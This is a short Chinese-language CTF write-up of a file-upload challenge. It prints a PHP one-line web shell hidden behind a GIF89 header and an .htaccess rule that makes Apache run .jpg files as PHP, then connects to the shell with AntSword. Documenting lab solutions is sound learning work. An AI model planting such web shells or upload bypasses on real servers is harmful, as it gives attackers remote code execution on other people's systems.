本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助

打开靶机,发现一个文件上传入口,

结合题目,需要传一个木马上去,
传一个测试文件上去,


发现被过滤,文件类型限制吗?大部分文件上传漏洞可以传入图片文件,
上传图片木马,

1
2
GIF89
<script language="php">@eval($_POST['cmd']); </script>


发现上传成功,现在需要将该png文件以php文件形式执行
老办法,burp抓包修改后缀名为TEST.html,发现不行,其他php文件后缀名也被过滤了

.Htaccess绕过

什么是.htaccess文件

htaccess文件全称是超文本入口,提供了针对目录改变配置的方法,即在一个特定的文档目录中放置一个包含一个或多个指令的文件,以作用于此目录及其所有子目录。
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

工作原理

Apache 在访问每个目录时都会查找.htaccess文件
找到后立即应用其中的指令

MIME类型设置

将以下内容写入创建的.htaccess文件中

1
2
3
<IfModule mime_module>
AddType application/x-httpd-php .jpg    
</IfModule>

只对jpg后缀文件有用,可以修改或添加.png等其他图片文件后缀(按照你上传图片格式需求)
就是把所有jpg后缀的文件全都当作php文件来执行


需要修改Content-Type字段,

上传成功

使用蚁剑连接,



获得flag